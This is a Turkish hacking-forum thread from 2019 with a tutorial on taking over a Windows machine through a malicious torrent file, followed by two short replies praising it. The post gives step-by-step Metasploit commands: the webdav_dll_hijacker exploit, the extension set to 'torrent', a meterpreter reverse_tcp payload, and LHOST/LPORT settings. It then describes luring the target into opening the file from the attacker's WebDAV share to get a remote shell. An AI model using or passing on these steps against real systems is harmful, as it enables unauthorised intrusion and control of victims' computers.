THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Torrent Dosyası ile Windows Hack // Qwx

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
04-10-2019 14:04
#1
Torrent Dosyası ile Windows Hack // Qwx
Torrent Dosyası ile Windows Hack

Torrentler sayesinde bir çok film,dizi ve oyun gibi içerikleri sistemimize indirmekteyiz. Torrentler bu kadar sık kullanılırken bizlerde bir Torrent dosyası yaratarak hedef sistemi nasıl ele geçireceğimizi bu konuda göreceğiz.Bu işlemi gerçekleştirmek için öncelikle Métasploit aracına sahip olmamız gerekmektedir. Kali Linux'da kurulu olarak gelen bu toolu msfconsole komutu ile çalıştırıyoruz.Métasploit aracımız çalıştıktan sonra komut satırına kullanacağımız olan exploitin girişini yapıyoruz use exploit/windows/browser/webdav_dll_hijacker ardından options komutu ile modullerimize bakıyoruz.Opsionts da EXTENSIONS bölümünde bulunan txt'yi torrent olarak ayarlamak için set EXTENSIONS torrent komutunu giriyoruz ve tekrardan options komutunu girdiğimizde değişikliğin gerçekleştirğini görmekteyiz.Ardından payload seçimi için set payload windows/meterpreter/reverse_tcp komutunu giriyoruz. LPORT gidisini verebilmek adına terminelimizde ifconfig komutunu kullanıyoruz.Eğer sizde ethernet ile ağa bağlanıyorsanız sarı olarak seçilmiş bölgede sizlerin LHOST adresi olacaktır. set LHOST <ipadres> girdikten sonra set LPORT 4444 ile de portumuzu belirliyoruz ve exploit komutunu çalıştırıyoruz.Exploit komutunu çalıştırdıktan sonra Exploit bağlantısının artık \\192.168.1.3\documénts 'de olduğunu bizlere söylemektedir. Hedef sistemde ilgili konuma gitmek için Windows + R tuş kombinasyonunu kullanarak Çalıştır'ı açıyoruz ve ilgili dizini giriyoruz.Hedef sistemde Torrent uygulamasının kurulu olması gerekmektedir. İlgili dosyayı açmak için ise Yüklü programlar listesinden program seçmek işaretledikten sonra Torrent uygulamasını seçiyoruz.
Hedef sistemde bizim oluşturmuş olduğumuz Torrent dosyası açıldığı zaman asıl makinemizde bir sessions oluşmuş olacaktır, bu şekilde hedef sisteme sızma işlemini gerçekleştirdik.

---------------------
A hacker does for love what others would not do for money.
0x762 - ait Kullanıcı Resmi (Avatar)
T Ü R K
Üyelik tarihi:
04/2007
Mesajlar:
38.858
Konular:
469
Teşekkür (Etti):
0
Teşekkür (Aldı):
4279
Ticaret:
(0) %
12-10-2019 10:17
#2
Cevap: Torrent Dosyası ile Windows Hack // Qwx
Daha önce dikkatimi çekmemiş bir özellikti eline sağlık.
MasterXO - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2019
Mesajlar:
19
Konular:
4
Teşekkür (Etti):
4
Teşekkür (Aldı):
3
Ticaret:
(0) %
13-10-2019 09:36
#3
Cevap: Torrent Dosyası ile Windows Hack // Qwx
Gerçekten güzel bir yöntem. Eline sağlık

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler